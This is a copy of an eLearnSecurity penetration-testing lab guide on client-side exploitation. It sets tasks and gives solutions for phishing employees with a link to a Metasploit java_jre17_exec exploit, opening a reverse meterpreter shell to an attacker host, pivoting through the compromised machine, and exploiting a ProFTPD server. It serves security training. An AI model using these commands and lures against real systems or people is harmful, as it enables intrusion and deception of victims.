0% found this document useful (0 votes)
66 views16 pages

Lab 11.0 - Client-Side Exploitation

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
66 views16 pages

Lab 11.0 - Client-Side Exploitation

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

HERA

LAB ID: 11

CLIENT-SIDE EXPLOITATION
Social Engineering
Client-side Exploitation
Pivoting
Linux FTP Service Exploitation
CLIENT-SIDE EXPLOITATION LAB ID: 11

1. LAB
You are a Penetration Tester and you’re asked to determine if the
corporate network is secure and if we are able to reach the servers
withing the DMZ. We have few information about our client ( named
foocompany.com ):

1) Few corporate email addresses

- [email protected]

- [email protected]

- [email protected]

2) The internal corporate network (10.10.50.0/23) is divided in two


segments: the internal network where the employees machine reside and
the DMZ where there are company servers.

eLearnSecurity s.r.l. © 2013 | H E R A 2


CLIENT-SIDE EXPLOITATION LAB ID: 11

2. GOALS
 Gain access to the internal network

 Exploit and get a shell to a server within the DMZ

3. WHAT YOU WILL LEARN


 How to use Client-Side attacks

 Pivoting

 Fingerprint Hosts and Services though Pivoting

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of
different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task you can achieve the Lab
goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of
this paper and check the solutions.

eLearnSecurity s.r.l. © 2013 | H E R A 3


CLIENT-SIDE EXPLOITATION LAB ID: 11

4. RECOMMENDED TOOLS
 metasploit

 nmap

 proxychains

 Mail client ( i.e. Thunderbird )

5. IMPORTANT NOTE
Further information:

 Labs machines (like web server and internal organization machines)


are not connected to the internet.

 In order to connect to the target organization and be able to send


emails to the target machines you have to create a new account in
your mail client with the following information:

POP/STMP server IP address: 10.10.51.25

 POP3: 110 - NO SSL

 SMTP: 25 - NO SSL

Your username: attacker

Your password: attacker

eLearnSecurity s.r.l. © 2013 | H E R A 4


CLIENT-SIDE EXPLOITATION LAB ID: 11

The following images show how Thunderbird should be configured:

With this configuration you should be able to send and receive email to
the organization email addresses.

NOTE: the mail server is out of our scope, so we will skip


any test against the address 10.10.50.25.

eLearnSecurity s.r.l. © 2013 | H E R A 5


CLIENT-SIDE EXPLOITATION LAB ID: 11

6. TASKS

Task 1: Find a way into the network

Since we only have the internal network IP addresses and they are not
directly reachable from Internet, we have to think of a way to get in the
network. One way is to use client side attacks against the employees in
order to gain access to their machines.

Task 1.1: Select an Exploit

Configure metasploit in order to create a link that points to an


exploit such as java_jre17_exec.

Task 1.2: Send the exploit

Once you have configured your exploit, send an email to the


corporate email addresses in order to lure the victim into clicking on it
and check whether they are vulnerable.

Task 2: Post-Exploitation

By now, you should have successfully exploited a machine in the


corporate network. Now run post-exploitation commands in order to find
as much information as possible regarding the machine and the network.
Are you able to find an IP address of a server that resides in the DMZ?

eLearnSecurity s.r.l. © 2013 | H E R A 6


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 3: Pivoting

Use the pivoting technique in order to reach the server in the DMZ.

Task 4: Verify the server version

Now that you have a connection to the server, run nmap in order to
discover what services and which versions of these services are in use.

Task 5: Exploit the server

You should now know that the server is running an FTP service and you
should know the daemon version. Find an exploit for that specific version
and try to exploit it!

eLearnSecurity s.r.l. © 2013 | H E R A 7


CLIENT-SIDE EXPLOITATION LAB ID: 11

Solutions

eLearnSecurity s.r.l. © 2013 | H E R A 8


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 1.1 – Select the Exploit

Since we have to use a client side exploit we are going to select one of the
newest java exploits: java_jre17_exec.

So let’s start metasploit and configure the module as follows:

//Select the module to use


msf > use exploit/multi/browser/java_jre17_exec
//set the server host (our ip address)
msf exploit(java_jre17_exec) > set SRVHOST 192.168.70.45
//set the URI path
msf exploit(java_jre17_exec) > set URIPATH /agenda
//The target to Windows
msf exploit(java_jre17_exec) > set TARGET 1
//Set the payload
msf exploit(java_jre17_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
//Set the local host
msf exploit(java_jre17_exec) > set LHOST 192.168.70.45
//Set the local port
msf exploit(java_jre17_exec) > set LPORT 443
//run the exploit
msf exploit(java_jre17_exec) > exploit

[*] Exploit running as background job


[*] Started reverse handler on 192.168.70.45:443
[*] Using URL: http://192.168.70.45:8080/agenda
[*] Server started.

eLearnSecurity s.r.l. © 2013 | H E R A 9


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 1.2 – Send the exploit

Now we have to lure the victim to open this link. To do that we will create
an email as follows:

http://192.168.70.45:8080/agenda

After few seconds we can see that in the metasploit console something is
happening. It seems that the user clicked the link in the mail and we are
getting the meterpreter shell! So the target is vulnerable to this java
vulnerability.

eLearnSecurity s.r.l. © 2013 | H E R A 10


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 2: Post-Exploitation

Now that we have a meterpreter shell to this machine we can start the
data harvesting phase. Let’s then list the network interfaces and find out
routes:

The ip address of the exploited machine is 10.10.50.8 and the default


gateway is 10.10.50.1. Let’s continue our investigation.

eLearnSecurity s.r.l. © 2013 | H E R A 11


CLIENT-SIDE EXPLOITATION LAB ID: 11

We can verify which connections are active on the machine issuing the
command netstat.

As we can see in the results, there is a connection to an host


(10.10.51.21) in the subnet 10.10.51.0/24. The process is named ftp and
the port is 21, so we can say that this is a connection to an FTP server that
mybe resides in the DMZ. Of course we can not directly access this server
from our attacker machine, since it is an internal network. Indeed if we
try a connection nothing happens:

In order to reach the server we have to use the exploited machine as a


bridge.

eLearnSecurity s.r.l. © 2013 | H E R A 12


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 3: Pivoting

Let’s use pivoting to send our traffic towards the other subnet. To do it
we can run the following command.

The previous command allows us to send the traffic to the subnet


10.10.51.0/24 through the meterpreter session of the exploited machine.

Since we want to run a version detection scan on the FTP server using
nmap, we have to configure a proxy where all the nmap traffic will pass
through. To do it let’s put the meterpreter session in background and
issue the following commands:

With this module (socks4a), all the traffic sent to our local address on port
1080 will go through metasploit. We can now use nmap with proxychains
in order to redirect the whole scan.

Note that proxychain should be configured with the following


parameters:

eLearnSecurity s.r.l. © 2013 | H E R A 13


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 4: Verify the server version

We can now run the scan issuing the following command:

As we can see, using proxychain we are able to redirect the nmap traffic
through the metasploit proxy, that will then redirect it through the
meterpreter session.

Now that we know the FTP server version (ProFTPD v 1.3.2a) and that it is
running on Unix, we can search if an exploit exists for this specific version.

eLearnSecurity s.r.l. © 2013 | H E R A 14


CLIENT-SIDE EXPLOITATION LAB ID: 11

Task 5: Exploit the FTP server

Let’s search if there is an exploit for this specific version of the FTP server,
issuing the following command in metasploit:

As we can see it exists. Let’s then try to configure the module and exploit
the server.

eLearnSecurity s.r.l. © 2013 | H E R A 15


CLIENT-SIDE EXPLOITATION LAB ID: 11

As we can see, since we have already configured the pivoting we are able
to run the exploit against the address 10.10.51.21. Indeed we now have a
command shell on the FTP server and we can start gathering information
on it:

eLearnSecurity s.r.l. © 2013 | H E R A 16

You might also like